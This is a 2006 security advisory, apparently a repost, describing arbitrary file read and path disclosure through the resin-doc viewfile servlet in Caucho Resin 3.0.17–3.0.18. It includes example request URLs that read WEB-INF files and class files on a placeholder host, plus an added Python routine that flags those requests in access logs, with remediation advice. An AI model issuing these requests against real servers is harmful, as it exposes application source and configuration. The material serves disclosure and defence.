Arrow  Topic : ScanAlert Security Advisory


Arrow  SecurityAlert : 908
Arrow  CVE : CVE-2006-2437
Arrow  CVE : CVE-2006-2438
Arrow  SecurityRisk : Low
Arrow  Remote Exploit : Yes
Arrow  Local Exploit : No
Arrow  Exploit Available : Yes
Arrow  Credit : Joseph Pierini (joep scanalert com)
Arrow  Published : 19.05.2006

Arrow  Affected Software : ScanAlert



Arrow  Advisory Content :  

ScanAlert Security Advisory
http://www.scanalert.com

Caucho Resin Multiple Vulnerabilities - Arbitrary File Access & Information Disclosure

Date: 5/16/06
Vendor: Caucho
Package: Resin
Version: 3.0.17 and 3.0.18 - Vendor Confirmed
Credit: ScanAlert's Security and Enterprise Services Teams.

Risk:
Common Vulnerability Scoring System (CVSS) -
http://www.first.org/cvss/intro/
 
Related Exploit Range: Remote
Attack Complexity: Low
Level Of Authentication Needed: Not Required 
Confidentiality Impact: Partial
Integrity Impact: Partial
Availability Impact: None

Overview

Caucho Resin is a high performance, Sun certified J2EE server featuring load balancing for increased reliability. Resin is well known for its flexibility and ease of use, saving both engineering time and staff costs.

Vulnerabilities

Resin contains documentation that is available in the /webapps directory as an expanded war file, served at /resin-doc by default when the standard resin.conf and Resin directory structure are used to configure the application.

This documentation contains a servlet for viewing files within the
integrated tutorial:

http://targetsystem/resin-doc/viewfile/?contextpath=%2Fresin-doc%2Fjmx%2Ftutorial%2Fbasic&servletpath=%2Findex.xtp&file=index.jsp&re-marker=&re-start=&re-end=#code-highlight

The viewfile servlet can easily read any file within the web root with no
parameters:

http://targetsystem/resin-doc/viewfile/?file=index.jsp

It is possible to set the context path outside of resin-doc and read any file on alternate web roots:

http://targetsystem/resin-doc/viewfile/?contextpath=/otherwebapp&servletpath=&file=WEB-INF/web.xml

When resin-doc is installed on a system it is possible to read all files
contained within the web root including class files which can then be
decompiled to view the Java source:

http://targetsystem/resin-doc/viewfile/?contextpath=/&servletpath=&file=WEB-INF/classes/com/webapp/app/target.class

An incorrect path in the request will reveal the absolute installation path:

File not found
/C:/customer/sites/deploy/n/wwwroot/WEB-INF/classes/com/webapp/app/non-existant.class
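The requests quoted above leave a recognisable trace in the web server access log. The following detection routine is an added example, not part of the advisory or of Resin: it parses constructed Common Log Format lines modelled on the advisory's URLs and flags viewfile requests whose contextpath leaves /resin-doc or whose file parameter targets WEB-INF, META-INF or a parent directory (the default contextpath of /resin-doc for requests that omit it is an assumption).

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (Common Log Format) modelled on the
# request patterns quoted in the advisory; these are not real logs.
SAMPLE_LOG = """\
10.0.0.5 - - [16/May/2006:10:01:02 +0000] "GET /resin-doc/viewfile/?contextpath=%2Fresin-doc%2Fjmx%2Ftutorial%2Fbasic&servletpath=%2Findex.xtp&file=index.jsp HTTP/1.1" 200 4120
10.0.0.9 - - [16/May/2006:10:01:07 +0000] "GET /resin-doc/viewfile/?contextpath=/otherwebapp&servletpath=&file=WEB-INF/web.xml HTTP/1.1" 200 2210
10.0.0.9 - - [16/May/2006:10:01:09 +0000] "GET /resin-doc/viewfile/?contextpath=/&servletpath=&file=WEB-INF/classes/com/webapp/app/target.class HTTP/1.1" 200 8870
10.0.0.9 - - [16/May/2006:10:01:11 +0000] "GET /resin-doc/viewfile/?contextpath=/&servletpath=&file=WEB-INF/classes/com/webapp/app/nonexistant.class HTTP/1.1" 404 312
10.0.0.7 - - [16/May/2006:10:02:00 +0000] "GET /index.jsp HTTP/1.1" 200 1500
"""

# Extracts method, request target and status code from a CLF line
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"\s+(?P<status>\d{3})')

def classify_viewfile_request(target):
    """Return a reason string if the request uses the resin-doc viewfile
    servlet to read outside the documentation webapp, otherwise None."""
    parts = urlsplit(target)
    if not parts.path.startswith("/resin-doc/viewfile"):
        return None
    params = parse_qs(parts.query, keep_blank_values=True)  # percent-decodes values
    # Assumption: a request without contextpath reads from resin-doc itself
    contextpath = params.get("contextpath", ["/resin-doc"])[0]
    filename = params.get("file", [""])[0]
    ctx = contextpath.rstrip("/") or "/"
    if ctx == "/":
        return "contextpath set to server root"
    if not (ctx == "/resin-doc" or ctx.startswith("/resin-doc/")):
        return "contextpath escapes resin-doc: %s" % contextpath
    if "WEB-INF" in filename or "META-INF" in filename or ".." in filename:
        return "sensitive file requested: %s" % filename
    return None

def find_viewfile_abuse(log_text):
    """Scan access-log text; return (line_no, status, reason) for each hit.
    A 404 hit matters too: the error page discloses the install path."""
    hits = []
    for n, line in enumerate(log_text.splitlines(), 1):
        m = REQUEST_RE.search(line)
        if not m:
            continue
        reason = classify_viewfile_request(m.group("target"))
        if reason:
            hits.append((n, int(m.group("status")), reason))
    return hits

if __name__ == "__main__":
    for hit in find_viewfile_abuse(SAMPLE_LOG):
        print("line %d (HTTP %d): %s" % hit)
```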

Solution:

Remove the resin-doc.war file from all production systems and do not deploy
using default configuration files. Upgrade to version 3.0.19 or better.

Resolution Timeline:

Vendor Notification: May 5, 2006
Vendor Response: May 9, 2006
Vendor Fix: May 15, 2006
Coordinated public release of advisory: May 16, 2006
------------------------------------------------------------------------

ScanAlert's mission is to make the web safe from hackers.

We make web sites secure from hackers and certify it to their customers via our patent pending HACKER SAFE® security certification technology. Our daily security audits and real-time certification enable consumers to know whether the sites where they shop are taking the necessary steps to safeguard their personal information from hackers. By alleviating consumers' fears of identity theft and credit card fraud, online merchants who earn HACKER SAFE certification consistently see substantial increases in online transactions.

For additional information regarding ScanAlert and the Hacker Safe program please contact:

Joseph Pierini, CISSP | Director, Enterprise Services
ScanAlert ( www.scanalert.com)
860 Napa Valley Corporate Way
Suite R
Napa, CA 94558
Phone: 877 302-9965
Int'l: 707 224-7656
Fax: 707 252-9626
Email: joep (at) scanalert (dot) com [email concealed]